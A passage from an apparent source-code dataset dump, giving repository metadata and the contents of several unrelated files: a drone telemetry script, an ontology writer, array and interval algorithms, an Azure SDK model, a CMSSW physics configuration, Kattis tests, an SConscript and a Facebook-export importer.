    async for position in drone.telemetry.position():
        current = round(position.relative_altitude_m)
        if current == last_reported:
            continue  # unchanged after rounding: stay quiet
        last_reported = current
        print(f"Altitude: {current}")
if __name__ == "__main__":
    # NOTE(review): asyncio.get_event_loop() is deprecated for this use in
    # newer Python; asyncio.run(run()) is the modern equivalent.
    loop = asyncio.get_event_loop()
    loop.run_until_complete(run())
|
[
"[email protected]"
] | |
6c78fccd11b2ca769683b6527aa888e158fea647
|
d9e26e516ab3863b6e7d00c4e3cdecf1af7028eb
|
/src/oaklib/io/streaming_nl_writer.py
|
ecde169932c3e55baa59bfdfd1aef1e274f6109a
|
[
"Apache-2.0"
] |
permissive
|
INCATools/ontology-access-kit
|
2f08a64b7308e8307d1aaac2a81764e7d98b5928
|
8d2a124f7af66fe2e796f9e0ece55585438796a5
|
refs/heads/main
| 2023-08-30T14:28:57.201198 | 2023-08-29T17:40:19 | 2023-08-29T17:40:19 | 475,072,415 | 67 | 15 |
Apache-2.0
| 2023-09-07T01:06:04 | 2022-03-28T15:50:45 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,152 |
py
|
from dataclasses import dataclass
from linkml_runtime.utils.yamlutils import YAMLRoot
from oaklib.datamodels import obograph
from oaklib.io.streaming_writer import StreamingWriter
from oaklib.utilities.nlp.natual_language_generation import NaturalLanguageGenerator
@dataclass
class StreamingNaturalLanguageWriter(StreamingWriter):
    """Streaming writer that renders each emitted item as natural-language text."""

    # Built lazily on first emit from self.ontology_interface.
    natural_language_generator: NaturalLanguageGenerator = None

    def emit_curie(self, curie, label=None, **kwargs):
        self._ensure_init()
        rendered = self.natural_language_generator.render_entity(curie)
        self.file.write(rendered)
        self.file.write("\n")

    def emit_obj(self, obj: YAMLRoot):
        self._ensure_init()
        # Only logical definition axioms have a natural-language rendering so far.
        if not isinstance(obj, obograph.LogicalDefinitionAxiom):
            raise NotImplementedError
        self.file.write(self.natural_language_generator.render_logical_definition(obj))
        self.file.write("\n")

    def _ensure_init(self):
        # Construct the generator on demand so instantiation stays cheap.
        if self.natural_language_generator is None:
            self.natural_language_generator = NaturalLanguageGenerator(self.ontology_interface)
|
[
"[email protected]"
] | |
3cc7c17ee582aaba4ab4d5771286ac2e1ae8b9e8
|
1b45d1162bd60a356844fc4dced068da2e6cc438
|
/Arrays/Merge.py
|
8ee66ae39f1687b433e476fa1b9e3be1d2e31015
|
[
"MIT"
] |
permissive
|
AnkitAvi11/Data-Structures-And-Algorithms
|
de9584e439861254cdce265af789c8b484c01c69
|
703f78819a41d4dd88caf71156a4a515651edc1b
|
refs/heads/master
| 2023-02-19T21:53:39.405934 | 2021-01-24T17:27:21 | 2021-01-24T17:27:21 | 297,752,655 | 6 | 3 |
MIT
| 2021-01-24T17:27:22 | 2020-09-22T19:33:55 |
Python
|
UTF-8
|
Python
| false | false | 669 |
py
|
"""
QUESTION STATEMENT : MERGE TWO SORTED ARRAYS WITHOUT USING ANY EXTRA SPACE
example :
arr1 = {1,3,5,7,9} size = n
arr2 = {2,4,6,8,10} size = m
arr1 after merging = {1,2,3,4,5,6,7,8,9,10}
"""
def mergeArrays(arr: list, arr2: list):
    """Merge two sorted lists in place, without an auxiliary merge buffer.

    On return ``arr`` holds the merged, fully sorted contents of both inputs
    (``arr2``'s remaining elements -- the largest ones -- are appended at the
    end).  ``arr2`` is mutated as working storage.

    Fixes over the original: the vestigial never-incremented index ``j`` is
    removed, ``arr2`` is only re-sorted after an actual swap (the original
    sorted on every iteration), and an empty ``arr2`` no longer raises
    IndexError.

    Worst-case complexity: O(n * m log m), n = len(arr), m = len(arr2).
    """
    for i in range(len(arr)):
        # If arr[i] exceeds the smallest element of arr2, the two belong in
        # each other's lists: trade them, then restore arr2's sorted order.
        if arr2 and arr[i] > arr2[0]:
            arr[i], arr2[0] = arr2[0], arr[i]
            arr2.sort()
    # Everything left in arr2 is >= every element now in arr.
    for el in arr2:
        arr.append(el)
if __name__ == '__main__':
    # Demo: merge two sorted five-element lists and show the combined result.
    first = [1, 3, 5, 7, 9]
    second = [2, 4, 6, 8, 10]
    mergeArrays(first, second)
    print(first)
|
[
"[email protected]"
] | |
aa27042ddeb0ddff82f1c8f4312778d7feb8da3e
|
cee65c4806593554662330368c799c14ec943454
|
/src/sqlvm-preview/azext_sqlvm_preview/vendored_sdks/sqlvirtualmachine/models/wsfc_domain_profile_py3.py
|
0d7864768ad80fab17f0ea7f8ca57ea27cec3b41
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
azclibot/azure-cli-extensions
|
d5d1a4ecdfc87fd79f5ad042fb85cdbf881897d2
|
c230646258d4b56efb7d44eb7a0230f2943da6f6
|
refs/heads/master
| 2023-08-28T03:55:02.311902 | 2019-04-04T16:05:45 | 2019-04-04T16:05:45 | 179,548,695 | 1 | 1 |
MIT
| 2021-07-28T15:26:17 | 2019-04-04T17:54:39 |
Python
|
UTF-8
|
Python
| false | false | 3,274 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class WsfcDomainProfile(Model):
    """Active Directory account details to operate Windows Server Failover
    Cluster.
    :param domain_fqdn: Fully qualified name of the domain.
    :type domain_fqdn: str
    :param ou_path: Organizational Unit path in which the nodes and cluster
    will be present.
    :type ou_path: str
    :param cluster_bootstrap_account: Account name used for creating cluster
    (at minimum needs permissions to 'Create Computer Objects' in domain).
    :type cluster_bootstrap_account: str
    :param cluster_operator_account: Account name used for operating cluster
    i.e. will be part of administrators group on all the participating virtual
    machines in the cluster.
    :type cluster_operator_account: str
    :param sql_service_account: Account name under which SQL service will run
    on all participating SQL virtual machines in the cluster.
    :type sql_service_account: str
    :param file_share_witness_path: Optional path for fileshare witness.
    :type file_share_witness_path: str
    :param storage_account_url: Fully qualified ARM resource id of the witness
    storage account.
    :type storage_account_url: str
    :param storage_account_primary_key: Primary key of the witness storage
    account.
    :type storage_account_primary_key: str
    """

    # Maps each Python attribute to its REST API (JSON) field name and type
    # for msrest (de)serialization.  AutoRest-generated: regenerate rather
    # than edit by hand (see file header).
    _attribute_map = {
        'domain_fqdn': {'key': 'domainFqdn', 'type': 'str'},
        'ou_path': {'key': 'ouPath', 'type': 'str'},
        'cluster_bootstrap_account': {'key': 'clusterBootstrapAccount', 'type': 'str'},
        'cluster_operator_account': {'key': 'clusterOperatorAccount', 'type': 'str'},
        'sql_service_account': {'key': 'sqlServiceAccount', 'type': 'str'},
        'file_share_witness_path': {'key': 'fileShareWitnessPath', 'type': 'str'},
        'storage_account_url': {'key': 'storageAccountUrl', 'type': 'str'},
        'storage_account_primary_key': {'key': 'storageAccountPrimaryKey', 'type': 'str'},
    }

    def __init__(self, *, domain_fqdn: str=None, ou_path: str=None, cluster_bootstrap_account: str=None, cluster_operator_account: str=None, sql_service_account: str=None, file_share_witness_path: str=None, storage_account_url: str=None, storage_account_primary_key: str=None, **kwargs) -> None:
        """Initialize the profile; all fields are optional keyword-only arguments."""
        super(WsfcDomainProfile, self).__init__(**kwargs)
        self.domain_fqdn = domain_fqdn
        self.ou_path = ou_path
        self.cluster_bootstrap_account = cluster_bootstrap_account
        self.cluster_operator_account = cluster_operator_account
        self.sql_service_account = sql_service_account
        self.file_share_witness_path = file_share_witness_path
        self.storage_account_url = storage_account_url
        self.storage_account_primary_key = storage_account_primary_key
|
[
"[email protected]"
] | |
d905ee37aa6ecea6a752fbc54249897a44a54d0e
|
66e6360325b781ed0791868765f1fd8a6303726f
|
/TB2009/WorkDirectory/5223 All Charges/ExportCharge.py
|
0256e8dcc77eb233c47742a482097e9b389b68a6
|
[] |
no_license
|
alintulu/FHead2011PhysicsProject
|
c969639b212d569198d8fce2f424ce866dcfa881
|
2568633d349810574354ad61b0abab24a40e510e
|
refs/heads/master
| 2022-04-28T14:19:30.534282 | 2020-04-23T17:17:32 | 2020-04-23T17:17:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,613 |
py
|
import FWCore.ParameterSet.Config as cms

# CMSSW job for the 2009 HCAL test beam: unpack raw test-beam data,
# reconstruct charges in HBHE and the VLSB motherboards, apply event
# selection, and export the merged charge collection.
process = cms.Process("PrintCharges")

process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(50000))

# Raw test-beam source and the FED/VME streams to read from it.
# NOTE(review): 'HTB_.root' (no run number) and the empty double() values
# further below look like placeholders filled in by a job-generation
# script -- confirm before running this file directly.
process.source = cms.Source("HcalTBSource",
    fileNames = cms.untracked.vstring('file:/tmp/chenyi/HTB_.root'),
    streams = cms.untracked.vstring('HCAL_Trigger','HCAL_SlowData','HCAL_QADCTDC','HCAL_DCC021','Chunk699')
)

# Conditions access: hardcoded calibrations plus ASCII overrides below.
process.hcal_db_producer = cms.ESProducer("HcalDbProducer",
    dump = cms.untracked.vstring(''),
    file = cms.untracked.string('')
)

process.es_hardcode = cms.ESSource("HcalHardcodeCalibrations",
    toGet = cms.untracked.vstring('GainWidths','PedestalWidths','QIEData','ChannelQuality','ZSThresholds','RespCorrs')
)

# Text-file calibrations specific to this test-beam setup: electronics
# map, pedestals and gains.
process.es_ascii = cms.ESSource("HcalTextCalibrations",
    input = cms.VPSet(
        cms.PSet(
            object = cms.string('ElectronicsMap'),
            file = cms.FileInPath('emap_TB2009_A.txt')
        ),
        cms.PSet(
            object = cms.string('Pedestals'),
            file = cms.FileInPath('pedestals_TB2009_.txt')
        ),
        cms.PSet(
            object = cms.string('Gains'),
            file = cms.FileInPath('gains_TB2009_LMIP_newpedestal.txt')
        )
    )
)

process.load("FWCore.MessageLogger.MessageLogger_cfi")
# Throttle framework progress reports to every 1000 events.
process.MessageLogger.cerr.FwkReport.reportEvery = 1000

# Unpack the test-beam wrapper objects (trigger, slow data, QADC/TDC, VLSB).
process.tbUnpacker = cms.EDFilter("HcalTBObjectUnpacker",
    IncludeUnmatchedHits = cms.untracked.bool(False),
    HcalTDCFED = cms.untracked.int32(8),
    HcalQADCFED = cms.untracked.int32(8),
    HcalSlowDataFED = cms.untracked.int32(3),
    HcalTriggerFED = cms.untracked.int32(1),
    HcalVLSBFED = cms.untracked.int32(699),
    ConfigurationFile = cms.untracked.string('configQADCTDC_TB2009.txt')
)

# Standard HCAL raw-to-digi for FED 21, keeping time samples 0-9.
process.hcalDigis = cms.EDFilter("HcalRawToDigi",
    UnpackZDC = cms.untracked.bool(True),
    FilterDataQuality = cms.bool(True),
    ExceptionEmptyData = cms.untracked.bool(True),
    InputLabel = cms.InputTag("source"),
    ComplainEmptyData = cms.untracked.bool(False),
    UnpackCalib = cms.untracked.bool(False),
    firstSample = cms.int32(0),
    lastSample = cms.int32(9),
    FEDs = cms.untracked.vint32(21),
    HcalFirstFED = cms.untracked.int32(21)
)

# HBHE reconstruction: integrate 4 samples starting at sample 5.
process.load("RecoLocalCalo.HcalRecProducers.HcalSimpleReconstructor_hbhe_cfi")
process.hbhereco.firstSample = 5
process.hbhereco.samplesToAdd = 4

process.options = cms.untracked.PSet(
    Rethrow = cms.untracked.vstring('ProductNotFound',
        'TooManyProducts',
        'TooFewProducts')
)

# Event selection: keep beam triggers only.
process.triggerfilter = cms.EDFilter("TriggerFilter",
    allowBeamTrigger = cms.untracked.bool(True),
    allowOutOfSpillPedestalTrigger = cms.untracked.bool(False),
    allowOthers = cms.untracked.bool(False)
)

# Require exactly one particle confined to a single tower.
process.oneparticle = cms.EDFilter("SingleTowerParticleFilter",
    particleNumber = cms.untracked.int32(1)
)

process.muonveto = cms.EDFilter("MuonVetoFilter")

# NOTE(review): this 'export' module is dead -- process.export is
# reassigned to a CExportChargeAnalyzer further below, which is the one
# actually used in the path.
process.export = cms.EDAnalyzer("ExportChargeAnalyzer",
    normalModule = cms.untracked.string('hbhereco')
)

# Per-event VLSB bookkeeping (pedestals, MIP calibration, ADC mapping).
# NOTE(review): beamEnergy is an empty double() -- placeholder, see above.
process.vlsbinfo = cms.EDProducer("VLSBInformationProducer",
    minSample = cms.untracked.uint32(0),
    maxSample = cms.untracked.uint32(31),
    baselineSamples = cms.untracked.uint32(2),
    useMotherBoard0 = cms.untracked.bool(True),
    useMotherBoard1 = cms.untracked.bool(True),
    useMotherBoard2 = cms.untracked.bool(False),
    useMotherBoard3 = cms.untracked.bool(True),
    usePedestalMean = cms.untracked.bool(False),
    mip = cms.untracked.string('MIP_EarlyRejection_Median.txt'),
    adcMap = cms.untracked.string('FinalAdcMapping_All.txt'),
    beamEnergy = cms.untracked.double()
)

process.vlsbreco = cms.EDProducer("HcalTBVLSBReconstructor",
    minSample = cms.untracked.uint32(0),
    maxSample = cms.untracked.uint32(31),
    mipFileName = cms.untracked.string("MIP_EarlyRejection_Median.txt"),
    adcMapFileName = cms.untracked.string("FinalAdcMapping_All.txt")
)

# NOTE(review): defined but not scheduled in process.p below.
process.energydistribution = cms.EDAnalyzer("FillRHEnergyDistributionAnalyzer",
    vlsbModule = cms.untracked.string("vlsbreco"),
    normalModule = cms.untracked.string("hbhereco"),
    output = cms.untracked.string("EnergyDistribution_ABC_.root")
)

# Timing/position cuts on the reconstructed hits.
process.timecut = cms.EDFilter("HighestSampleTimeFilter",
    minimum = cms.untracked.double(7.5),
    threshold = cms.untracked.double(100)
)

process.hitcut = cms.EDFilter("HitXFilter",
    maximum = cms.untracked.double(-5)
)

# Total-energy window: mincut is required, maxcut is negated (~) in the
# path, i.e. events must be above 'mincut' and below 'maxcut'.
# NOTE(review): both minimum values are empty double() placeholders.
process.mincut = cms.EDFilter("RHTotalEnergyCut",
    minimum = cms.untracked.double(),
    vlsbModule = cms.untracked.string("vlsbreco"),
    normalModule = cms.untracked.string("hbhereco")
)

process.maxcut = cms.EDFilter("RHTotalEnergyCut",
    minimum = cms.untracked.double(),
    vlsbModule = cms.untracked.string("vlsbreco"),
    normalModule = cms.untracked.string("hbhereco")
)

# Merge VLSB and HBHE rec-hits into one collection for export.
process.merge = cms.EDProducer("CombineCollectionProducer",
    vlsbModule = cms.untracked.string("vlsbreco"),
    normalModule = cms.untracked.string("hbhereco")
    # interCalibration = cms.untracked.string("InterCalibration_Secondary.txt")
)

# Final exporter (replaces the earlier ExportChargeAnalyzer binding).
process.export = cms.EDAnalyzer("CExportChargeAnalyzer",
    moduleName = cms.untracked.string('merge'),
    simplified = cms.untracked.bool(True),
    exportVlsb = cms.untracked.bool(True)
)

# NOTE(review): beamEnergy placeholder, see above.
process.runinfo = cms.EDProducer("RunInformationProducer",
    beamEnergy = cms.untracked.double()
)

# Full processing sequence; '~' inverts the maxcut filter decision.
process.p = cms.Path(
    process.tbUnpacker *
    process.vlsbinfo *
    process.runinfo *
    process.vlsbreco *
    process.hcalDigis *
    process.hbhereco *
    process.triggerfilter *
    process.oneparticle *
    process.muonveto *
    process.timecut *
    process.hitcut *
    process.mincut *
    ~process.maxcut *
    process.merge *
    process.export
)
|
[
"[email protected]"
] | |
c477af6c57995ecddcbfdc254fe373d15f3999c8
|
321b4ed83b6874eeb512027eaa0b17b0daf3c289
|
/252/252.meeting-rooms.234346443.Runtime-Error.leetcode.py
|
92868ca8e540837d3283eb90122ea37aa2b82d4d
|
[] |
no_license
|
huangyingw/submissions
|
7a610613bdb03f1223cdec5f6ccc4391149ca618
|
bfac1238ecef8b03e54842b852f6fec111abedfa
|
refs/heads/master
| 2023-07-25T09:56:46.814504 | 2023-07-16T07:38:36 | 2023-07-16T07:38:36 | 143,352,065 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 316 |
py
|
class Solution:
    def canAttendMeetings(self, intervals):
        """Return True if one person can attend every meeting.

        After sorting by start time, the schedule is feasible iff no meeting
        starts strictly before the previous one ends; meetings that merely
        touch (prev.end == next.start) do not conflict.

        The original accumulated every processed interval in a list although
        only the previous interval's end time is ever inspected; tracking
        that single value uses O(1) extra space instead of O(n).

        :param intervals: iterable of objects with ``start`` and ``end``
        :returns: bool
        """
        prev_end = None
        for interval in sorted(intervals, key=lambda x: x.start):
            # Conflict: this meeting begins before the previous one finished.
            if prev_end is not None and prev_end > interval.start:
                return False
            prev_end = interval.end
        return True
|
[
"[email protected]"
] | |
fc02fda54534594dd3a8358ecf562fc2cbd36a7e
|
0a1716384ac3425b0f457e210e43c0a499bd66d2
|
/process_files/_old/fix_processed_names.py
|
27e83d345283a04bd753cafb4edbf2a7f9b3850a
|
[] |
no_license
|
ilbarlow/process-rig-data
|
d54d0489ad42ef92e422915d01ac43feeb62bed3
|
89fc296628eb7f9260b099ee3cb2f25680905686
|
refs/heads/master
| 2020-03-18T21:50:05.775230 | 2018-03-28T20:13:41 | 2018-03-28T20:13:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,596 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 27 16:15:39 2016
@author: worm_rig
"""
import os
import shutil
import glob
import numpy as np
import pandas as pd
import warnings
from functools import partial
if __name__ == '__main__':
    # Archive root and the experiment whose processed files need repair.
    output_root = '/Volumes/behavgenom_archive$/Avelino/Worm_Rig_Tests/short_movies_new/'
    exp_name = 'Double_pick_090217'
    # Table mapping each original file path to its renamed counterpart.
    tsv_file = os.path.join(output_root, 'ExtraFiles', exp_name + '_renamed.tsv')
    rename_table = pd.read_table(tsv_file, names=['old', 'new'])
    for _, record in rename_table.iterrows():
        # PC number encoded in the old path as a 'PC<n>' directory component.
        old_path_parts = record['old'].split(os.sep)
        pc_num = [int(part[2:]) for part in old_path_parts if part.startswith('PC')][0]
        # Channel number encoded in the old file name as a 'Ch<n>' token.
        old_stem = os.path.splitext(os.path.basename(record['old']))[0]
        old_channel = [int(tok[2:]) for tok in old_stem.split('_') if tok.startswith('Ch')][0]
        # Two channels per PC: rebuild the global channel index and splice it
        # into the new file stem in place of the stale 'Ch' token.
        new_stem = os.path.splitext(os.path.basename(record['new']))[0]
        corrected_ch = 'Ch{}'.format(2*(pc_num-1)+old_channel)
        fixed_tokens = [tok.strip() if not tok.startswith('Ch') else corrected_ch
                        for tok in new_stem.split('_')]
        fixed_stem = '_'.join(fixed_tokens)
        # Rename every file derived from this stem (dry run: print only).
        pattern = os.path.join(output_root,'**', exp_name, new_stem + '*')
        for bad_name in glob.glob(pattern):
            good_name = bad_name.replace(new_stem, fixed_stem)
            print(bad_name, good_name)
            #shutil.move(bad_name, good_name)
|
[
"[email protected]"
] | |
148ea8e659b1f395932dd56bb4319bd9d6022474
|
9ec58308459dc95405d1a32fcf8fae7f687a207b
|
/test/test_k_bank.py
|
71dc290f6f4630d2eaa7649866a90201a40f7e18
|
[
"MIT"
] |
permissive
|
ivanlyon/exercises
|
067aed812486dbd7a3d7de6e47a692c8b9383163
|
0792976ae2acb85187b26a52812f9ebdd119b5e8
|
refs/heads/master
| 2021-05-24T04:17:29.012329 | 2021-05-11T17:26:50 | 2021-05-11T17:26:50 | 65,584,450 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,597 |
py
|
import io
import unittest
from unittest.mock import patch
from kattis import k_bank
###############################################################################
class SampleInput(unittest.TestCase):
    '''Problem statement sample inputs and outputs'''

    def _assert_main_io(self, input_lines, expected_output):
        '''Run k_bank.main() feeding input_lines on stdin; check stdout.'''
        stdin_text = '\n'.join(input_lines) + '\n'
        with patch('sys.stdin', io.StringIO(stdin_text)) as stdin,\
                patch('sys.stdout', new_callable=io.StringIO) as stdout:
            k_bank.main()
        self.assertEqual(stdout.getvalue(), expected_output)
        # The solution must consume all of its input.
        self.assertEqual(stdin.read(), '')

    def test_sample_input_1(self):
        '''Run and assert problem statement sample 1 input and output.'''
        self._assert_main_io(
            ['4 4', '1000 1', '2000 2', '500 2', '1200 0'],
            '4200\n')

    def test_sample_input_2(self):
        '''Run and assert problem statement sample 2 input and output.'''
        self._assert_main_io(
            ['3 4', '1000 0', '2000 1', '500 1'],
            '3000\n')
###############################################################################
# Allow running this test module directly (outside a test runner).
if __name__ == '__main__':
    unittest.main()
|
[
"[email protected]"
] | |
dcdfd17496925a85400ab2e195a3c8e50d5401e6
|
d7f486eebaa164bf3274c843e1932c7eef596e5e
|
/importer/facebook.py
|
352a80e06ffca4048160d7b028cf173373aa9667
|
[
"MIT"
] |
permissive
|
Galaxyvintage/journal-1
|
aafe107645a6dde038b0010496c041ac635e966d
|
f666a3b38f0eeb2cc1f5576e0668f174bf1cbd8d
|
refs/heads/master
| 2020-03-20T09:15:09.269993 | 2018-07-05T16:31:17 | 2018-07-05T16:31:17 | 137,332,462 | 0 | 0 | null | 2018-06-14T08:54:38 | 2018-06-14T08:54:37 | null |
UTF-8
|
Python
| false | false | 7,091 |
py
|
import events
from database import db
import json
import datetime
import os
def load_to_json(filename):
    """Read *filename* and return its parsed JSON content.

    The original opened the file without ever closing it, leaking the
    handle until garbage collection; the context manager closes it
    deterministically.
    """
    with open(filename) as json_file:
        return json.loads(json_file.read())
def read_app_posts(directory):
    """Import posts made through third-party Facebook apps as events."""
    posts = load_to_json(directory + "apps/posts_from_apps.json")["app_posts"]
    for post in posts:
        external = post["attachments"][0]["data"][0]["external_context"]
        posted_at = datetime.datetime.fromtimestamp(post["timestamp"])
        title = post["title"]
        message = external["name"]
        # The posting app is only recoverable from the title text
        # ("... via <app>.").
        if "via" in title:
            app_name = title[title.index("via") + 4 : -1]
        else:
            app_name = "unknown app"
        details = {"message": message, "title": title, "app": app_name}
        if "url" in external:
            details["url"] = external["url"]
        events.add("Facebook post via " + app_name + ": " + message,
                   posted_at, ["facebook", "post", "app"], details)
def read_app_installs(directory):
    """Import Facebook app installations as events."""
    installs = load_to_json(directory + "apps/installed_apps.json")
    for app in installs["installed_apps"]:
        installed_at = datetime.datetime.fromtimestamp(app["time_added"])
        events.add("Added Facebook app " + app["name"] + ".",
                   installed_at, ["facebook", "app"], {"app": app["name"]})
def read_comments(directory):
    """Import the user's Facebook comments as events."""
    for comment in load_to_json(directory + "comments/comments.json")["comments"]:
        commented_at = datetime.datetime.fromtimestamp(comment["timestamp"])
        text = comment["data"][0]["comment"]["comment"]
        events.add("Facebook: " + comment["title"], commented_at,
                   ["facebook", "comment"], {"message": text})
def read_events(directory):
    """Import Facebook events the user joined or hosted."""
    responses = load_to_json(directory + "events/event_responses.json")
    for joined in responses["event_responses"]["events_joined"]:
        events.add("Participated in Facebook event: " + joined["name"],
                   datetime.datetime.fromtimestamp(joined["start_timestamp"]),
                   ["facebook", "event"], {"name": joined["name"]})

    hosted_data = load_to_json(directory + "events/your_events.json")
    for hosted in hosted_data["your_events"]:
        events.add("Hosted Facebook event: " + hosted["name"],
                   datetime.datetime.fromtimestamp(hosted["start_timestamp"]),
                   ["facebook", "event"],
                   {"name": hosted["name"],
                    "location": hosted["place"]["name"],
                    "message": hosted["description"]})
def read_friends(directory):
    """Import friend additions as events."""
    for friend in load_to_json(directory + "friends/friends_added.json")["friends"]:
        added_at = datetime.datetime.fromtimestamp(friend["timestamp"])
        friend_name = friend["name"]
        events.add("Added Facebook friend " + friend_name + ".", added_at,
                   ["facebook", "friend"], {"name": friend_name})
def create_conversation_event(title, message_count, time, participants, history, first):
    """Record one conversation session (a burst of messages) as an event.

    *first* selects the "Started a conversation" wording used for the very
    first session of a conversation; later sessions use "Exchanged ...".
    """
    plural = "s" if message_count > 1 else ""
    details = {"participants": participants, "message": history}
    if first:
        summary = ("Started a Facebook conversation with " + title + " (" +
                   str(message_count) + " message" + plural + ").")
    else:
        summary = ("Exchanged " + str(message_count) + " Facebook message" +
                   plural + " with " + title + ".")
    events.add(summary, time, ["facebook", "message"], details)
def read_messages(directory):
    """Import Facebook conversations, grouping messages into sessions.

    Messages are replayed oldest-first; a gap of more than four hours
    between consecutive text messages closes the running session, and each
    session is recorded as one event.  Photo attachments become separate
    sent/received events.
    """
    message_directory = directory + "messages/"
    # One subdirectory per conversation; 'stickers_used' is export metadata.
    for conversation in [os.path.join(message_directory, name) for name in os.listdir(message_directory) if os.path.isdir(os.path.join(message_directory, name)) and name != "stickers_used"]:
        data = load_to_json(conversation + "/message.json")
        if not data.has_key("title"):
            continue
        title = data["title"]
        # Fall back to the conversation title when no participant list exists.
        participants = [title]
        if data.has_key("participants"):
            participants = data["participants"]
        messages = data["messages"]
        session_start_time = None
        last_message_time = None
        history = ""  # accumulated "sender: text" transcript of the session
        message_count = 0
        session_count = 0
        # The export lists messages newest-first; iterate oldest-first.
        for message in reversed(messages):
            if message.has_key("content"):
                message_time = datetime.datetime.fromtimestamp(message["timestamp"])
                if session_start_time is None:
                    session_start_time = message_time
                elif (message_time - last_message_time).total_seconds() > 4 * 60 * 60:
                    # Gap longer than 4 hours: flush the running session.
                    create_conversation_event(title, message_count, session_start_time, ", ".join(participants), history, session_count == 0)
                    session_start_time = message_time
                    message_count = 0
                    session_count += 1
                    history = ""
                last_message_time = message_time
                message_count += 1
                history += message["sender_name"] + ": " + message["content"] + "\n"
            # A photo whose sender is absent from the participant list is
            # treated as sent (presumably by the account owner -- confirm),
            # otherwise as received from that participant.
            if message.has_key("photos") and not message["sender_name"] in participants:
                events.add("Sent " + (str(len(message["photos"])) + " images" if len(message["photos"]) > 1 else "an image") + " to " + title + ".",
                           datetime.datetime.fromtimestamp(message["timestamp"]),
                           ["facebook", "message", "image"], kvps={"participants": ", ".join(participants)}, images=[directory + photo["uri"] for photo in message["photos"]])
            if message.has_key("photos") and message["sender_name"] in participants:
                events.add("Received " + (str(len(message["photos"])) + " images" if len(
                    message["photos"]) > 1 else "an image") + " from " + message["sender_name"] + ".",
                           datetime.datetime.fromtimestamp(message["timestamp"]),
                           ["facebook", "message", "image"], kvps={"participants": ", ".join(participants)},
                           images=[directory + photo["uri"] for photo in message["photos"]])
        # Flush the final session.  NOTE(review): for a conversation with no
        # text messages this passes session_start_time=None -- confirm that
        # events.add tolerates a None time.
        create_conversation_event(title, message_count, session_start_time, ", ".join(participants), history, session_count == 0)
def read_photos(directory):
    """Import photos from every album of the export as events.

    Each album JSON under photos/album/ contributes one event per photo,
    geotagged when the photo metadata carries coordinates, and tagged with
    the camera model when EXIF data is present.
    """
    photo_directory = directory + "photos/album/"
    for album_file in [os.path.join(photo_directory, name) for name in os.listdir(photo_directory)]:
        data = load_to_json(album_file)
        album_name = data["name"]
        for photo in data["photos"]:
            # NOTE: 'file' shadows the Python 2 builtin of the same name.
            file = directory + photo["uri"]
            metadata = photo["media_metadata"]["photo_metadata"]
            # Prefer the capture time; fall back to the modification time.
            time = datetime.datetime.fromtimestamp(metadata["taken_timestamp"]) if metadata.has_key("taken_timestamp") else datetime.datetime.fromtimestamp(metadata["modified_timestamp"])
            tags = ["facebook", "photo"]
            kvps = {}
            if metadata.has_key("camera_make") and metadata.has_key("camera_model"):
                camera = metadata["camera_make"] + " " + metadata["camera_model"]
                tags.append(camera)
                kvps["camera"] = camera
            # The photo path doubles as the deduplication hash.
            events.add("Added photo to Facebook album " + album_name + ".",
                       time,
                       tags,
                       kvps,
                       hash=file,
                       latitude=(metadata["latitude"] if metadata.has_key("latitude") else None),
                       longitude=(metadata["longitude"] if metadata.has_key("longitude") else None),
                       images=[file])
def import_facebook_data(directory = "data/facebook/"):
    """Import every supported section of a Facebook export under *directory*.

    All events are added inside a single database transaction, so a failed
    import leaves the event store untouched.
    """
    with db.atomic():
        print("Reading Facebook app posts...")
        read_app_posts(directory)
        read_app_installs(directory)
        print("Reading Facebook comments...")
        read_comments(directory)
        print("Reading Facebook events...")
        read_events(directory)
        print("Reading Facebook friends...")
        read_friends(directory)
        print("Reading Facebook messages...")
        read_messages(directory)
        print("Reading Facebook photos...")
        read_photos(directory)
# Run the importer with its default export location when executed directly.
if __name__ == "__main__":
    import_facebook_data()
|
[
"[email protected]"
] | |
9088845ee4cd9fc4f784727bc6f020bc4213b6a6
|
786de89be635eb21295070a6a3452f3a7fe6712c
|
/Detector/tags/V00-00-05/SConscript
|
d6fb3976c08526bf2e9adb925905a3b3a1b85635
|
[] |
no_license
|
connectthefuture/psdmrepo
|
85267cfe8d54564f99e17035efe931077c8f7a37
|
f32870a987a7493e7bf0f0a5c1712a5a030ef199
|
refs/heads/master
| 2021-01-13T03:26:35.494026 | 2015-09-03T22:22:11 | 2015-09-03T22:22:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,454 |
#--------------------------------------------------------------------------
# File and Version Information:
# $Id$
#
# Description:
# SConscript file for package Detector
#------------------------------------------------------------------------
# Do not delete following line, it must be present in
# SConscript file for any SIT project
Import('*')

#
# For the standard SIT packages which build libraries, applications,
# and Python modules it is usually sufficient to call
# standardSConscript() function which defines rules for all
# above targets. Many standard packages do not need any special options,
# but those which need can modify standardSConscript() behavior using
# a number of arguments, here is a complete list:
#
# LIBS - list of additional libraries needed by this package
# LIBPATH - list of directories for additional libraries
# BINS - dictionary of executables and their corresponding source files
# TESTS - dictionary of test applications and their corresponding source files
# SCRIPTS - list of scripts in app/ directory
# UTESTS - names of the unit tests to run, if not given then all tests are unit tests
# PYEXTMOD - name of the Python extension module, package name used by default
# CCFLAGS - additional flags passed to C/C++ compilers
# NEED_QT - set to True to enable Qt support
#
#
#standardSConscript()
# Build this package with its Python extension module named "detector_ext".
standardSConscript(PYEXTMOD="detector_ext")
#, DOCGEN="doxy-all psana-modules-doxy")
|
[
"[email protected]@b967ad99-d558-0410-b138-e0f6c56caec7"
] |
[email protected]@b967ad99-d558-0410-b138-e0f6c56caec7
|
|
3bb4b250c9e481e8342d3d85a655fadd62014d8a
|
82c7adb0bfaa667c50ac7b336bb815863b378fa9
|
/finace/items.py
|
60984524386545327a13568ee270fe67c087fc4d
